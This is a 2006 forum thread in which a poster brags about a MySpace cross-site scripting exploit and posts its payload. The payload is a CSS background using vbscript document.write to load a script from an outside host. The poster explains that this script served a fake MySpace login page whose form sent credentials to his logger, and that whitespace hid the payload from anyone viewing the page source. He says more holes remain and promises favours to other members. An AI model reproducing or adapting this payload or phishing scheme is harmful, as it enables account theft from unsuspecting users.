1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

(my mySpace exploit)

Discussion in 'Computers, Games, Electronics etc' started by VTECin5th, Apr 1, 2006.

  1. VTECin5th

    VTECin5th Administrator

    Messages:
    2,182
    Likes Received:
    4
    Joined:
    Apr 17, 2005
    Location:
    Phoenix Az
    Someone leaked or snitched on me, so Tom fixed my method of XSS on mySpace, there's a few more but i will wait a little bit before i do them, i'm sure he's lookin now.
    He did write me a nice little message though:
    "I LOL at your penix"
    I laughed [​IMG]
    (this is mostly to those people who were requesting mySpace favors--please wait a few weeks)

    Code:
    OMG I THOUGHT I KNEW YOU BUT I WAS WRONG OK!!!
    <Style type="text/css">Body{background: url(vb script:document.write("%3CScript%20src%3Dhttp%3A%2F%2F_yoursite_._ORG_%2FmySpace.js%3E%3C%2Fscript%3E"));background-color: 000000;scrollbar-face-color: 252525;scrollbar-arrow-color: FFFFFF;scrollbar-highlight-color: 252525;scrollbar-3dlight-color: 252525;scrollbar-shadow-color: 252525;
    scrollbar-darkshadow-color: 252525;scrollbar-track-color: 252525;}</style>
    
    Inside mySpace.js was url escaped html inside a JS function to unescape it...this kept the XSS on the same server.
    The HTML was just the myspace login page with form actions to my site/logger, when they looked at the url it was still on myspace.com.
    If they viewed source the spaces you see before the vbscript write and the %3C pushed that out of view so everything looked perfectly normal.
    There's only 4 more holes i know of to continue to be able to do this :p
    I lol @ tom's penix.
     
  2. GSRCRXsi

    GSRCRXsi Super Moderator Moderator VIP

    Messages:
    9,622
    Likes Received:
    345
    Joined:
    Nov 13, 2002
    Location:
    MD
    haha. i was just gonna ask you for some more :). what is penix?
     
  3. VTECin5th

    VTECin5th Administrator

    Messages:
    2,182
    Likes Received:
    4
    Joined:
    Apr 17, 2005
    Location:
    Phoenix Az
    teh hax00r equivalent of penis.

    I'm going to include the source code to the first step in the first post.
     
Verification:
Draft saved Draft deleted

Share This Page